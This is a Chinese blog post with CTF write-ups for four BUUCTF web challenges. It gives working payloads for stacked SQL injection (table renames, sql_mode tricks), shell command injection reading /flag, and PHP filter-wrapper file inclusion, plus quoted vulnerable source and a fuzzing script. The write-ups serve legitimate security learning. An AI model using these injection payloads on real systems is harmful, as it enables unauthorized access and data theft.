BUUCTF-随便注、Exec、EasySQL、Secret File

最新推荐文章于 2024-06-08 11:12:41 发布
最新推荐文章于 2024-06-08 11:12:41 发布
阅读量777 收藏 2
点赞数
分类专栏: CTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62905261/article/details/125245425
版权

目录

[强网杯 2019]随便注

[ACTF2020 新生赛]Exec

[SUCTF 2019]EasySQL

[极客大挑战 2019]Secret File

[强网杯 2019]随便注

打开场景,里面有输入框,上面自带一个1,点击提交,有回显

输入1 ' or '1'='1 有回显,因该是字符型

猜测是sql注入,查询字段数,输入1' order by 1 #

当查询到第三个字段的时候,回显异常,说明只有两个字段

输入1' union select 1,2 #    回显一个正则过滤规则

过滤了很多的东西

 查询数据库,输入1'; show databases;#成功回显

 查询表,输入1';show tables;#成功回显

 得到了两个表,words和1919810931114514,分别查看,输入1'; show columns from `words`; #

参考大佬的wp得知这里的``而不是''是个坑

mysql中引号(')和反勾号(`)的区别:

linux下不区分,windows下区分

区别:

单引号或双引号主要用于字符串的引用符号

eg: mysql> SELECT 'hello',"hello";

反勾号主要用于数据库、表、索引、列和别名用的引用符

eg: `mysql>SELECT * FROM     `table`     WHERE `from`='abc';

发现了有用的信息,在1919810931114514中发现了flag字段,但是最后一步卡住了我,不知道该怎么办,上网查询大佬的wp得知:sql过滤了很多的词,但是没有过滤alert和rename,将words改名为words1,再把1919810931114514改为words,再把新的words中的flag改名为id。构造payload:1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;show columns from words;#

 输入1' or '1'='1,即得flag

 参考wp:BUUCTF-Web-随便注(三种解题思路) - 简书

[ACTF2020 新生赛]Exec

打开场景,命令执行题 

先ping一下自己的地址,发现有回显

 直接ls命令列出文件(127.0.0.1|ls),发现了index.php,继续查看根目录(127.0.0.1|ls /)发现flag

 

 用cat命令直接读取flag内容,127.0.0.1|cat /flag

[SUCTF 2019]EasySQL

打开场景,非常熟悉的提交页面,

提交一个1,有回显,跟随便注有点像,猜测和随便注一样是堆叠注入

查询一下库名,1;show databases;  有回显

继续查询表名, 1;show tables;    有回显,并且出现了Flag的字眼,当我以为快要成功的时候,继续往下查看Flag内容时, 1;show columns from `Flag`;    它竟然回显nonono

然后我就不会了,只能查看大佬的wp

wp中说,当时这个比赛的时候有源码泄露

<?php
    session_start();

    include_once "config.php";

    $post = array();
    $get = array();
    global $MysqlLink;

    //GetPara();
    $MysqlLink = mysqli_connect("localhost",$datauser,$datapass);
    if(!$MysqlLink){
        die("Mysql Connect Error!");
    }
    $selectDB = mysqli_select_db($MysqlLink,$dataName);
    if(!$selectDB){
        die("Choose Database Error!");
    }

    foreach ($_POST as $k=>$v){
        if(!empty($v)&&is_string($v)){
            $post[$k] = trim(addslashes($v));
        }
    }
    foreach ($_GET as $k=>$v){
        }
    }
    //die();
    ?>

<html>
<head>
</head>

<body>

<a> Give me your flag, I will tell you if the flag is right. </ a>
<form action="" method="post">
<input type="text" name="query">
<input type="submit">
</form>
</body>
</html>

<?php

    if(isset($post['query'])){
        $BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile
        			|readfile|where|from|union|update|delete|if|sleep|extractvalue|
    			    updatexml|or|and|&|\"";
        //var_dump(preg_match("/{$BlackList}/is",$post['query']));
        if(preg_match("/{$BlackList}/is",$post['query'])){
            //echo $post['query'];
            die("Nonono.");
        }
        if(strlen($post['query'])>40){
            die("Too long.");
        }
        $sql = "select ".$post['query']."||flag from Flag";
        mysqli_multi_query($MysqlLink,$sql);
        do{
            if($res = mysqli_store_result($MysqlLink)){
                while($row = mysqli_fetch_row($res)){
                    print_r($row);
                }
            }
        }while(@mysqli_next_result($MysqlLink));

    }
    
    ?>

发现过滤了很多的很多的关键词,

ps:网上也有通过fuzz查询过滤掉的关键词:

import requests
 
url = "http://0f2d22cb-56bf-4239-8e1c-1deb288bac41.node4.buuoj.cn:81/"
with open('sql-fuzz.txt') as f:
    for line in f:
        data = {"query": line}
        r = requests.post(url,data=data)
        if('Nonono' in r.text):
            print(line.strip(),end=" ")

1.大佬们说没有过滤set关键字,并且从源码中得知执行语句是:$sql = "select ".$post['query']."||flag from Flag";

这里||代表的意思是:如果前一个操作数为真,则不看后面的语句

在这里要使用一个参数是:set_mode=PIPPES_AS_CONCAT

MySQL中sql_mode参数_依米娜娜的博客-CSDN博客_sql_mode

构造执行语句:

select 99;set sql_mode=PIPES_AS_CONCAT;select 0 ||flag from Flag

输入即得flag

2.大佬们还说没有过滤*

直接输入*,1  即可得flag

因为内置得sql语句是:$sql = "select ".$post['query']."||flag from Flag";

如果$post['query']得数据为,1,sql语句就变成了select *,1||flag from Flag,也就是select *,1 from Flag

参考wp:[SUCTF 2019]EasySQL_D.MIND的博客-CSDN博客

[极客大挑战 2019]Secret File

打开题目,里面漆黑一片

 查看网页源代码,现有一个Oh!  You found me,但是在网页上没有显示

 

 点进去又一个新的页面

 继续点进去

 它说查阅结束,这么快谁能看得清?无奈之下bp抓包,发现secr3t.php

进入网页之后直接url查看secr3t.php,得到php代码块

 发现没有过滤file,直接使用php伪协议

参考: PHP伪协议详解_Snakin_ya的博客-CSDN博客_php伪协议

构造payload:secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php

 获得base64加密字符串:PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7YWNhYTY3NDYtNTUwNy00OWI3LTkwYzAtNWNiZjc2OWI3MjBjfSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=

直接base64解密可得flag

一夜至秋.
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf[强网杯 2019]随便 1(超详细,三种解法)
m0_73734159的博客
10-26 2117
网页环境判断是否是字符型入1'判断是否存在关键字过滤select联合查询被过滤,只能用堆叠入了查看有几个字段正常回显回显报错,可以看出只有两个字段查看所有数据库查看所有数据表爆words数据表的字段爆1919810931114514数据表字段(意数据表为数字的时候需要用反引号括起来);可以看到这两个表words表有两个字段,而另一个只有一个字段。
BUUCTF-web-随便
nareku的博客
07-06 1177
输入1试试,可以看到是GET传参 判断一下是数字型入还是字符型入 可以看出来是字符型入了,接下来就是常规猜解SQL查询语句中的字段数输入 : 1' order by 1# 输入: 1' order by 2#输入: 1' order by 3# 说明字段数为2 常规使用联合查询输入: 1' union select 1,2# 发现一些常用的查询关键词都被过滤了捏,但是堆叠查询入貌似没有,试试堆叠查询入输入: 1' ; show databases;#说明堆叠查询入可行输入: -1' ;
BUUCTF:Web-[极客大挑战 2019]EasySQL
最新发布
wdnmddbl的博客
06-08 413
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点练习sql入,推荐使用sql-labs这个靶场,我后续也会更新从开始搭建到攻略1-75关完整教程,早些关上车哦。大概思路和涉及的知识点(这里我一律复制网上师傅总结的即可,网上的师傅们总结的很完美,我就不东施效颦)思路:文章很详细。
buuctf(EasySQL)
qq_75005708的博客
04-12 244
发现过滤了flag,看了其它的wp,这道题是内部查询语句,想让||不是逻辑或,用sql_mode去转换它,设置。sql_mode它定义了 MySQL 应支持的 SQL 语法,以及应该在数据上执行何种确认检查。还有就是这个模式下进行查询的时候,使用字母连接会报错,使用数字连接才会查询出数据,因为这个。然后我们接着查 1;回显为1,我们接着查看表 1;2.我们查看数据库 1;0就没有什么回显,然后我们去看看源代码。也只有看出post,其它也没有什么。回显是1,我们再看看0。然后我们先输入1看看。
BUUCTF【Web】随便(SQL入)
qq_70434663的博客
03-02 536
但是因为表过滤了select,所以使用rename先把words表改为其它的表名,在把1919810931114514表改为words表,给新的words表添加新的列名id,最后将flag改名为data。猜测是SQL入,我们随便输入1'(单引号为英文状态下输入)发现报错提示表明此为单引号的SQL入。第一步,测试入点(利用引号,and 1=1 ,or 1=1之类的判断是字符型还是数字型)我们发现在1919810931114514表里面爆出了flag字段,猜测flag就在里面。接下来,爆出两张表的内容。
BUUCTF——[SUCTF2019]EasySQL
weixin_62248541的博客
11-28 340
BUUCTF——[SUCTF2019]EasySQL
BUUCTF[极客大挑战 2019] EasySQL 1
m0_75178803的博客
06-12 4281
因为这道题是基于sql单引号的入,我们构造万能密码,#在sql入中是释符。题目来源:BUUCTF [极客大挑战 2019] EasySQL 1。用or连接,因为1=1恒真,假或真=真,真或真=真,所以这个语句恒成立。输入 1' union select 1,2,3。查看报错信息发现是基于单引号的入。由一道题简单引出万能密码的知识点。这是查询数据库可能会用到的句型。只有当输入1’时,页面报错。直接在用户名或者密码区输入。只有当列名字段数为3时,
zipkin-server-2.12.9-exec.jar
05-25
《深入理解Java档案库:以zipkin-server-2.12.9-exec.jar为例》 在Java开发领域,jar(Java Archive)文件是常见的代码打包格式,它将多个类文件和其他资源组合到一个可执行的档案中。"zipkin-server-2.12.9-exec....
最新版-zipkin-server-2.23.2-exec.jar.rar
09-02
在给定的文件“最新版-zipkin-server-2.23.2-exec.jar.rar”中,包含的是Zipkin Server的执行版本2.23.2。这个版本的Zipkin Server是一个可执行的JAR文件,用于运行和管理Zipkin服务。 Zipkin的核心功能包括: 1. *...
zipkin-server-2.11.2-exec.jar
02-03
zipkin-server-2.11.2-exec
BUUCTF【Web】EasySQL
qq_70434663的博客
03-05 414
进入靶场后,
[极客大挑战 2019]Havefun1、EasySQL(BUUCTF)
HackerYY的博客
12-31 2168
[极客大挑战2019]的两道水题 内附解题过程
ctf(EasySQL)
Glacier_Mount的博客
10-07 595
查询语句的简单猜测
记buuctf 0x01
qq_43871200的博客
03-13 2344
接上一个关于buuoj上的题解,确实题很多,慢慢刷吧 [SUCTF 2019]EasySQL 唉,大佬做题都是习惯在题目上标上Easy,本菜鸡已无力吐槽(自己菜还能怪谁。。。) Give me your flag, I will tell you if the flag is right. 输入框 只有一个输入框,输入查询的东西,只有三种回显,一个是数组,一个是Nonono,一个是返回空,猜测...
堆叠入——BUUCTF-随便
ancan8807的博客
09-07 651
由题目提示知道,这题需要进行sql入 输入1'发现报错 再输入1';show batabases#出现了一大堆数据库 再输入1';show tables#出现了两个表 猜测flag在这2个表中,输入1';show create table `1919810931114514`;尝试打开表1,发现 因为select被过滤了,所以先将select *...
BUUCTF [SUCTF 2019] EasySQL
Senimo
03-30 2125
BUUCTF [SUCTF 2019] EasySQL Web writeup 启动靶机,打开页面: 根据题目判断是SQL入,判断入类型: 1;show databases; 最终判断为堆叠入,查看当前表名: 1;show tables; 得到当前表名为Flag,多次入无果,查看writeup存在源码泄露:index.php.swp,本环境无泄露 <?php se...
web buuctf [极客大挑战 2019]Secret File1
weixin_44214568的博客
08-05 294
1.点击靶机,查看到主页的源代码,源代码含有Archive_room.php;打开该文件,发现源代码中含有action.php,继续点开,界面提示
BUUCTF之[极客大挑战 2019]Secret File--------文件包含和密码文件
weixin_44632787的博客
06-13 1013
  BUUCTF之[极客大挑战 2019]Secret File--------文件包含和密码文件 启动我们的项目,看到挑战的页面 右键查看网页的源代码   看到一个可疑的链接,我们访问它:./Archive_room.php。然后出现以下新的页面,我们根据提示访问它看看会出现什么…   啊啊啊???什么?就没别的提示了吗?   不急,我们看看源代码。好吧源代码什么也没有。但是根据上一个页面的提示:**没看清楚?回去再仔细看看吧。**这句话很可疑,是不是提示我们说那里有个重定向,导致页面跳转的太快所
[原题复现]SUCTF 2019 WEB EasySQL(堆叠入)
笑花大王
02-09 874
简介 原题复现: 1 <?php 2 session_start(); 3 4 include_once "config.php"; 5 6 $post = array(); 7 $get = array(); 8 global $MysqlLink; 9 10 //GetPara(); 11 $...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值